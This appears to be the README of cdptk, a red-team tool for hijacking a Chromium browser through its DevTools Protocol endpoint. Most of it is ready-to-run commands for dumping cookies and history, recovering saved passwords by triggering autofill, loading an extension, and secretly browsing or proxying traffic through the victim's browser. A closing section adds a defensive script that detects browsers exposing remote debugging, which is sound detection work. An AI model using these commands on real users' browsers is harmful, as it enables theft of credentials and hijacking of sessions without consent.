cdptk is a Python command-line tool for working with Chromium browsers through the Chrome DevTools Protocol (CDP). It is built for penetration testing and red team workflows where you have access to a running browser's CDP endpoint and want to inspect browser state, collect artifacts, or browse through the user's browser context.
From the CDP-Toolkit folder:
pip install -e .
cdptk --help
cdptk discover --cdp-endpoint http://127.0.0.1:9222
cdptk tabs list --cdp-endpoint http://127.0.0.1:9222
cdptk tabs screenshot 1 --cdp-endpoint http://127.0.0.1:9222 --out tab-1.png
cdptk cookies dump --cdp-endpoint http://127.0.0.1:9222 --out cookies.json
cdptk bookmarks list --cdp-endpoint http://127.0.0.1:9222 --out bookmarks.json
cdptk history search azure --cdp-endpoint http://127.0.0.1:9222 --limit 50
cdptk saved-passwords list --cdp-endpoint http://127.0.0.1:9222
cdptk extensions list --cdp-endpoint http://127.0.0.1:9222
cdptk extensions load "C:\Users\defaultuser\Desktop\adobe" --cdp-endpoint http://127.0.0.1:9222
Shows basic information about the browser behind the CDP endpoint. It queries /json/version and /json/list, then reports the browser product, protocol version, user agent, WebSocket debugger URL, and visible HTTP targets.
Use it first to confirm that the endpoint is reachable and that you are talking to the expected browser.
cdptk discover --cdp-endpoint http://127.0.0.1:9222
Lists open browser page targets as stable, 1-based tab indexes for the current command invocation. Each row includes a short target ID prefix, title, URL, and browser context when available.
Use this before tab-scoped actions such as screenshots. The indexes are generated from the current CDP target list, so rerun tabs list if tabs are opened or closed.
cdptk tabs list --cdp-endpoint http://127.0.0.1:9222
Captures a screenshot of a specific tab. The tab can be selected by the index from tabs list, a target ID prefix, or unique text from the tab title or URL.
This attaches to the tab through CDP and uses Page.captureScreenshot. With --full, it attempts a full-page capture instead of only the current viewport.
cdptk tabs screenshot 1 --cdp-endpoint http://127.0.0.1:9222 --out tab-1.png
cdptk tabs screenshot portal.azure.com --cdp-endpoint http://127.0.0.1:9222 --full --out portal.png
Dumps browser cookies through CDP using Storage.getCookies. It can filter by domain, redact values for safer review, and write JSON to disk.
This command asks the browser for cookies; it does not read cookie database files from the profile.
cdptk cookies dump --cdp-endpoint http://127.0.0.1:9222 --out cookies.json
cdptk cookies dump --cdp-endpoint http://127.0.0.1:9222 --domain microsoftonline.com
Collects bookmarks or favorites through browser-rendered WebUI. The command opens the browser's bookmarks/favorites UI through CDP, prefers the browser's WebUI bookmark model when available, and falls back to rendered DOM extraction when needed.
It returns flattened bookmark rows by default, including title, URL, folder path, IDs, and timestamps when available. Use --tree for the raw browser bookmark tree.
cdptk bookmarks list --cdp-endpoint http://127.0.0.1:9222 --out bookmarks.json
cdptk bookmarks list azure --cdp-endpoint http://127.0.0.1:9222 --domain microsoft.com
Searches browser history through the rendered chrome://history or edge://history WebUI. The command opens a temporary history target, inspects the WebUI model or rendered page, scrolls/loads entries as needed, and closes the temporary target after collection.
Use this to answer questions like "what sites has this browser visited" without touching the profile's History SQLite file.
cdptk history search azure --cdp-endpoint http://127.0.0.1:9222 --limit 50
cdptk history search --cdp-endpoint http://127.0.0.1:9222 --domain login.microsoftonline.com
Lists saved-password site metadata through the browser's password manager WebUI. It returns site groups, usernames, entry IDs, affiliated domains, passkey indicators, and storage hints when the browser exposes them.
This command inventories saved-password metadata. It does not decrypt passwords directly and does not read the Login Data database.
Warning
saved-passwords list opens the browser password-manager/settings WebUI through CDP. Edge only populates saved-password rows in a visible target in current testing, so Edge is restricted to --mode visible. Chrome works with --mode visible, --mode background, and --mode hidden.
cdptk saved-passwords list --cdp-endpoint http://127.0.0.1:9222 --out saved-password-sites.json
Attempts an autofill-backed password recovery workflow against a real origin. The command creates a real browser window, optionally parks it offscreen, enables focus emulation, uses either the page's login form or an injected controlled form, triggers browser password autofill with CDP input events, and reads the resulting field values through CDP.
Start with the real saved login URL and --no-inject-form. The saved-password realm and login URL have to match closely. Prefer the exact URL Chrome shows for the saved site, such as http://test.local/; a different path, host, or port can prevent the popup from offering the credential even when a similar page is served. --inject-form is still useful when the page markup fights autofill, but current testing shows the real page is the better first attempt.
The popup selection path is deliberately simple: click a credential field, wait for Chromium's saved-password popup, send ArrowDown and Enter through CDP keyboard events, then read the field values. It tries the username field first, then the password field if needed. The popup is browser UI, so the tool avoids coordinate-clicking the black popup row. Tune --popup-open-ms if a slow site needs more time before the keyboard selection.
Warning
saved-passwords dump defaults to --mode visible because Chromium's browser-side password popup is native browser UI. --mode offscreen parks the window at negative coordinates; Edge handled that in testing, but Chrome may fail if its saved-password popup cannot anchor to the offscreen native window.
By default, the command prints a compact JSON result with the recovered values and the attempt that worked. Use --full when you need the diagnostic window bounds, field geometry, and per-attempt details.
cdptk saved-passwords dump http://test.local/ --cdp-endpoint http://127.0.0.1:9222 --no-inject-form --out autofill.json
cdptk saved-passwords dump https://example.com/login --cdp-endpoint http://127.0.0.1:9222 --mode visible --popup-open-ms 1200 --out autofill.json
cdptk saved-passwords dump https://example.com/login --cdp-endpoint http://127.0.0.1:9222 --full --out autofill-debug.json
cdptk saved-passwords dump https://example.com --cdp-endpoint http://127.0.0.1:9222 --no-inject-form --username-selector "#user" --password-selector "#pass"
Inventories installed extensions through chrome://extensions or edge://extensions WebUI. It opens a temporary WebUI target, extracts extension rows from the browser's rendered extension manager, and closes the target.
The output can include names, extension IDs, enabled state, descriptions, views/options pages, and related metadata depending on what the WebUI exposes.
cdptk extensions list --cdp-endpoint http://127.0.0.1:9222 --out extensions.json
Loads an unpacked extension directory through the browser-target CDP command Extensions.loadUnpacked. The CDP endpoint must already be open, and the path must be an absolute directory path as seen by the browser host.
By default the command sends enableInIncognito=false, matching Chromium's normal unpacked-loader behavior. Add --enable-incognito to request incognito access, and --local-check when the browser host is the same machine and you want the toolkit to verify the directory exists before sending the CDP command.
cdptk extensions load "C:\Users\defaultuser\Desktop\adobe" --cdp-endpoint http://127.0.0.1:9222
cdptk extensions load "C:\Users\defaultuser\Desktop\adobe" --cdp-endpoint http://127.0.0.1:9222 --out loaded-extension.json
Creates a new browser target through CDP. It can open a visible tab, background tab, hidden target, or an isolated browser context.
Use --hold for hidden targets or temporary contexts that should stay alive after creation. Without --hold, hidden targets can disappear when the CDP session closes.
cdptk page new https://example.com --cdp-endpoint http://127.0.0.1:9222 --mode visible
cdptk page new https://example.com --cdp-endpoint http://127.0.0.1:9222 --mode hidden --hold
Captures a structured page snapshot from an existing target. --kind ax captures an accessibility tree with Accessibility.getFullAXTree; --kind dom captures a DOM snapshot with DOMSnapshot.captureSnapshot.
Use accessibility snapshots for quick semantic inspection and DOM snapshots for lower-level page structure.
cdptk page snapshot <target-prefix> --cdp-endpoint http://127.0.0.1:9222 --kind ax --out page.ax.json
cdptk page snapshot <target-prefix> --cdp-endpoint http://127.0.0.1:9222 --kind dom --out page.dom.json
Closes a target by full target ID or unique prefix. This is the cleanup command for targets you created with page new, browser-takeover screencast, or manual CDP work.
cdptk page close <target-prefix> --cdp-endpoint http://127.0.0.1:9222
Lists non-default browser contexts. These are isolated contexts created through CDP, often for proxied browsing or contained sessions.
The default browser context is not listed because Chrome/Edge does not expose it as a normal disposable context.
cdptk contexts list --cdp-endpoint http://127.0.0.1:9222
Disposes a non-default browser context and closes its targets. Use this to clean up isolated/proxied contexts created with page new --mode isolated or browser-takeover screencast --browser-socks.
cdptk contexts dispose <browserContextId> --cdp-endpoint http://127.0.0.1:9222
Starts a local operator web console that controls a CDP browser target through screencast frames and input events. The target browser renders the page; the operator sees a streamed view and sends clicks, keyboard input, paste, navigation, reload, back/forward, and close actions through CDP.
This is the highest-fidelity interactive browsing mode because Chrome/Edge remains the real browser running the site. It keeps browser-held cookies, storage, enterprise auth state, WebAuthn behavior, extensions, and browser-specific JavaScript behavior inside the browser that already owns that state. This is especially helpful when targeting complex web apps that do not play well with browser-takeover proxy.
Warning
browser-takeover screencast creates a real Chrome/Edge target on the CDP host. Depending on the selected mode and current browser/window state, the new tab, window, or web page may be visible to the user.
cdptk browser-takeover screencast `
--cdp-endpoint http://127.0.0.1:9222 `
--listen 127.0.0.1:8093 `
--start-url https://portal.azure.com `
--mode offscreen
Then browse locally to:
http://127.0.0.1:8093
Modes:
| Mode | What it does |
|---|---|
| offscreen | Creates a dedicated window and moves it off-screen before screencasting it. |
| background | Creates a background tab in the current browser window. |
Starts a local HTTP/HTTPS proxy on the operator machine. The operator points a local browser or HTTP client at this proxy, and upstream requests are fetched through hidden victim-Chrome tabs using CDP.
For HTTPS, the toolkit generates a local CA and per-host leaf certificates. Import runs/proxy/certs/ca.crt into the operator browser if you want HTTPS sites to render without certificate errors.
cdptk browser-takeover proxy `
--cdp-endpoint http://127.0.0.1:9222 `
--listen 127.0.0.1:8080 `
--cert-dir runs/proxy/certs `
--mode hidden `
--resource-strategy safe `
--download-policy deny `
-v
Configure the operator browser proxy:
HTTP proxy: 127.0.0.1:8080
HTTPS proxy: 127.0.0.1:8080
What the proxy does:
- Accepts plaintext HTTP proxy requests and HTTPS CONNECT.
- Uses victim Chrome to perform upstream document requests.
- Preserves victim Chrome cookies and user agent where CDP exposes them.
- Strips blocking CSP/CORS/framing headers to improve operator-side renderability.
- --mode hidden uses hidden CDP fetch targets when supported. Use --mode background when hidden targets are unsupported or you want visible browser tabs for troubleshooting.
- --resource-strategy safe uses Network.loadNetworkResource for GET/HEAD subresources such as fonts, scripts, styles, images, and download-prone extensions so those bytes stream back to the operator instead of causing victim-side downloads. Use --resource-strategy navigate to force the older navigate-everything behavior.
- --download-policy deny asks each CDP fetch target to deny browser downloads while proxying. Use --download-policy allow when you intentionally want browser-managed downloads.
- Retries top-level GET/HEAD attachment navigations that abort with net::ERR_ABORTED using a same-origin Runtime.evaluate(fetch(..., credentials: "include")) fallback so the operator browser can receive the file.
Proxy mode is useful for targeted request/response workflows and for browsing from the victim browser's network position. It is less faithful than screencast mode for complex portals because the operator browser renders and executes JavaScript locally while victim Chrome performs upstream fetches.
Use page close for individual targets and contexts dispose for isolated browser contexts. Temporary WebUI targets created by collectors are intended to close automatically.
cdptk page close <target-prefix> --cdp-endpoint http://127.0.0.1:9222
cdptk contexts dispose <browserContextId> --cdp-endpoint http://127.0.0.1:9222
The tool is built on the information presented in "Modern Session Hijacking by Living off the DevTools Protocol" by Cedric Van Bockhaven.
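
Every command above depends on a browser that was started with remote debugging enabled, so the defender-side check is to look for that in process telemetry. The following is an added example, not part of cdptk: it audits process command lines (constructed samples) for Chromium's --remote-debugging-port, --remote-debugging-pipe, --remote-debugging-address and --remote-allow-origins switches; the executable name list and the severity labels are assumptions.

```python
import re

# Assumed executable names for Chrome, Edge and Chromium builds.
BROWSERS = {"chrome", "chrome.exe", "msedge", "msedge.exe", "chromium", "chromium-browser"}
LOOPBACK = {"", "127.0.0.1", "localhost", "::1", "[::1]"}
FLAG_RE = re.compile(r'--([a-z][a-z-]*)(?:=("[^"]*"|\S+))?')

def image_name(cmdline):
    """Basename of the executable, handling a quoted Windows path."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', cmdline)
    return re.split(r'[\\/]', m.group(1) or m.group(2))[-1].lower() if m else ""

def audit_cmdline(cmdline):
    """Return a finding for a browser process that exposes CDP, else None."""
    if image_name(cmdline) not in BROWSERS:
        return None
    flags = {k: v.strip('"') for k, v in FLAG_RE.findall(cmdline)}
    if "type" in flags:  # renderer/gpu/utility child; the parent process is reported
        return None
    if "remote-debugging-port" not in flags:
        if "remote-debugging-pipe" in flags:
            return {"severity": "low", "port": None,
                    "reasons": ["CDP over an inherited pipe, no TCP listener"]}
        return None
    port = flags["remote-debugging-port"]
    severity, reasons = "medium", [f"unauthenticated CDP listener on port {port}"]
    if port == "0":
        reasons.append("ephemeral port, recorded in DevToolsActivePort in the profile")
    addr = flags.get("remote-debugging-address", "")
    if addr not in LOOPBACK:
        severity = "high"
        reasons.append(f"requested bind address {addr} is not loopback")
    if flags.get("remote-allow-origins") == "*":
        severity = "high"
        reasons.append("DevTools WebSocket accepts any Origin header")
    return {"severity": severity, "port": port, "reasons": reasons}

def audit(lines):
    return [(line, f) for line in lines if (f := audit_cmdline(line))]

# Constructed process-creation command lines (not captured from a real host).
SAMPLE = [
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222',
    r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" '
    r'--remote-debugging-port=9222 --remote-debugging-address=0.0.0.0 --remote-allow-origins=*',
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --remote-debugging-port=9222',
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory=Default',
    r'/usr/bin/chromium --headless --remote-debugging-pipe',
]
```

Feed audit() the command lines from process-creation telemetry; a medium finding is still worth triage, because a loopback CDP listener can be reached by any local process.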